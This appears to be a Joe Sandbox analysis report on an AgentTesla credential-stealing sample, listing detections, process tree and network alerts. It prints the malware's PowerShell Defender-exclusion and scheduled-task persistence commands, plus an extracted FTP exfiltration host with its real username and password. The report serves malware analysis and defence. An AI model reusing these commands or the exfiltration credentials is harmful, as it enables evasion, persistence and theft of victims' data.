Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s2Jg1MAahY.exe

Overview

General Information

Sample name:s2Jg1MAahY.exe
renamed because original name is a hash value
Original sample name:130c869f7ce90b4dd45a1192c8cb13aa8e3f986ab29fb9f446475e2030a2d2ec.exe
Analysis ID:1587906
MD5:6239c4047e0f1c4f55a96199e77d3669
SHA1:7967d09a6357dfb6abbd99963dbcf9ee46b50bd9
SHA256:130c869f7ce90b4dd45a1192c8cb13aa8e3f986ab29fb9f446475e2030a2d2ec
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • s2Jg1MAahY.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\s2Jg1MAahY.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
    • powershell.exe (PID: 7708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7296 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7780 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • s2Jg1MAahY.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\s2Jg1MAahY.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
  • GedTanqRR.exe (PID: 8088 cmdline: C:\Users\user\AppData\Roaming\GedTanqRR.exe MD5: 6239C4047E0F1C4F55A96199E77D3669)
    • schtasks.exe (PID: 3512 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • GedTanqRR.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Roaming\GedTanqRR.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
  • sgxIb.exe (PID: 7260 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
    • schtasks.exe (PID: 7528 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp30F5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 7704 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
    • sgxIb.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
  • sgxIb.exe (PID: 8184 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
    • schtasks.exe (PID: 7748 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp50A2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 5472 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 6239C4047E0F1C4F55A96199E77D3669)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000019.00000002.2977002334.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 33 entries
              SourceRuleDescriptionAuthorStrings
              15.2.sgxIb.exe.505fdb0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                15.2.sgxIb.exe.505fdb0.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  15.2.sgxIb.exe.505fdb0.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  15.2.sgxIb.exe.505fdb0.3.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x30370:$s2: GetPrivateProfileString
                  • 0x2f9fa:$s3: get_OSFullName
                  • 0x3116b:$s5: remove_Key
                  • 0x31357:$s5: remove_Key
                  • 0x32275:$s6: FtpWebRequest
                  • 0x3315e:$s7: logins
                  • 0x336d0:$s7: logins
                  • 0x36427:$s7: logins
                  • 0x36493:$s7: logins
                  • 0x37f12:$s7: logins
                  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
                  9.2.GedTanqRR.exe.4c3d218.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 43 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s2Jg1MAahY.exe", ParentImage: C:\Users\user\Desktop\s2Jg1MAahY.exe, ParentProcessId: 7516, ParentProcessName: s2Jg1MAahY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", ProcessId: 7708, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s2Jg1MAahY.exe, ProcessId: 7948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s2Jg1MAahY.exe", ParentImage: C:\Users\user\Desktop\s2Jg1MAahY.exe, ParentProcessId: 7516, ParentProcessName: s2Jg1MAahY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", ProcessId: 7708, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\GedTanqRR.exe, ParentImage: C:\Users\user\AppData\Roaming\GedTanqRR.exe, ParentProcessId: 8088, ParentProcessName: GedTanqRR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp", ProcessId: 3512, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\s2Jg1MAahY.exe", ParentImage: C:\Users\user\Desktop\s2Jg1MAahY.exe, ParentProcessId: 7516, ParentProcessName: s2Jg1MAahY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp", ProcessId: 7780, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s2Jg1MAahY.exe", ParentImage: C:\Users\user\Desktop\s2Jg1MAahY.exe, ParentProcessId: 7516, ParentProcessName: s2Jg1MAahY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe", ProcessId: 7708, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\s2Jg1MAahY.exe", ParentImage: C:\Users\user\Desktop\s2Jg1MAahY.exe, ParentProcessId: 7516, ParentProcessName: s2Jg1MAahY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp", ProcessId: 7780, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T19:16:35.902330+010020299271A Network Trojan was detected192.168.2.449743110.4.45.19721TCP
                    2025-01-10T19:16:41.503463+010020299271A Network Trojan was detected192.168.2.449753110.4.45.19721TCP
                    2025-01-10T19:16:49.648006+010020299271A Network Trojan was detected192.168.2.449759110.4.45.19721TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T19:16:36.746851+010028555421A Network Trojan was detected192.168.2.449748110.4.45.19749512TCP
                    2025-01-10T19:16:36.752254+010028555421A Network Trojan was detected192.168.2.449748110.4.45.19749512TCP
                    2025-01-10T19:16:42.333821+010028555421A Network Trojan was detected192.168.2.449755110.4.45.19756014TCP
                    2025-01-10T19:16:42.339180+010028555421A Network Trojan was detected192.168.2.449755110.4.45.19756014TCP
                    2025-01-10T19:16:50.477613+010028555421A Network Trojan was detected192.168.2.449760110.4.45.19758731TCP
                    2025-01-10T19:16:50.483043+010028555421A Network Trojan was detected192.168.2.449760110.4.45.19758731TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T19:17:53.843622+010018000071A Network Trojan was detected192.168.2.450008110.4.45.19762859TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T19:17:52.872682+010018000081A Network Trojan was detected192.168.2.450000110.4.45.19765033TCP
                    2025-01-10T19:17:56.489053+010018000081A Network Trojan was detected192.168.2.450027110.4.45.19756202TCP
                    2025-01-10T19:18:08.875649+010018000081A Network Trojan was detected192.168.2.450038110.4.45.19764854TCP
                    2025-01-10T19:18:23.666309+010018000081A Network Trojan was detected192.168.2.450039110.4.45.19749158TCP
                    2025-01-10T19:18:33.306104+010018000081A Network Trojan was detected192.168.2.450041110.4.45.19764021TCP
                    2025-01-10T19:18:33.357346+010018000081A Network Trojan was detected192.168.2.450042110.4.45.19759944TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: s2Jg1MAahY.exeAvira: detected
                    Source: http://ftp.haliza.com.myAvira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeAvira: detection malicious, Label: HEUR/AGEN.1350994
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeAvira: detection malicious, Label: HEUR/AGEN.1350994
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 78%
                    Source: s2Jg1MAahY.exeVirustotal: Detection: 69%Perma Link
                    Source: s2Jg1MAahY.exeReversingLabs: Detection: 78%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeJoe Sandbox ML: detected
                    Source: s2Jg1MAahY.exeJoe Sandbox ML: detected
                    Source: s2Jg1MAahY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49758 version: TLS 1.2
                    Source: s2Jg1MAahY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 4x nop then jmp 0ED5112Ah0_2_0ED5147A
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 4x nop then jmp 0ED5112Ah0_2_0ED51991
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 4x nop then jmp 076B049Ah9_2_076B07EA
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 0B80049Ah15_2_0B8007EA
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 0B80049Ah15_2_0B800D01
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 0913049Ah22_2_091307EA

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49748 -> 110.4.45.197:49512
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49755 -> 110.4.45.197:56014
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49753 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49760 -> 110.4.45.197:58731
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49759 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49743 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 1800008 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Screenshots : 192.168.2.4:50000 -> 110.4.45.197:65033
                    Source: Network trafficSuricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.4:50008 -> 110.4.45.197:62859
                    Source: Network trafficSuricata IDS: 1800008 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Screenshots : 192.168.2.4:50038 -> 110.4.45.197:64854
                    Source: Network trafficSuricata IDS: 1800008 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Screenshots : 192.168.2.4:50027 -> 110.4.45.197:56202
                    Source: Network trafficSuricata IDS: 1800008 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Screenshots : 192.168.2.4:50041 -> 110.4.45.197:64021
                    Source: Network trafficSuricata IDS: 1800008 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Screenshots : 192.168.2.4:50039 -> 110.4.45.197:49158
                    Source: Network trafficSuricata IDS: 1800008 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Screenshots : 192.168.2.4:50042 -> 110.4.45.197:59944
                    Source: global trafficTCP traffic: 110.4.45.197 ports 62570,62132,49512,64854,57660,63986,59944,55440,56014,58731,56510,49158,49476,50413,65033,64021,61591,62859,1,2,56202,56301,52528,21
                    Source: global trafficTCP traffic: 192.168.2.4:49740 -> 110.4.45.197:56301
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 110.4.45.197 110.4.45.197
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49738 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2977044627.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000332B000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.000000000338C000.00000004.00000800.00020000.00000000.sdmp, s2Jg1MAahY.exe, 00000008.00000002.2977044627.0000000003456000.00000004.00000800.00020000.00000000.sdmp, GedTanqRR.exe, 0000000D.00000002.2976437638.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.2978687835.000000000335C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.2977002334.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: s2Jg1MAahY.exe, sgxIb.exe.8.dr, GedTanqRR.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
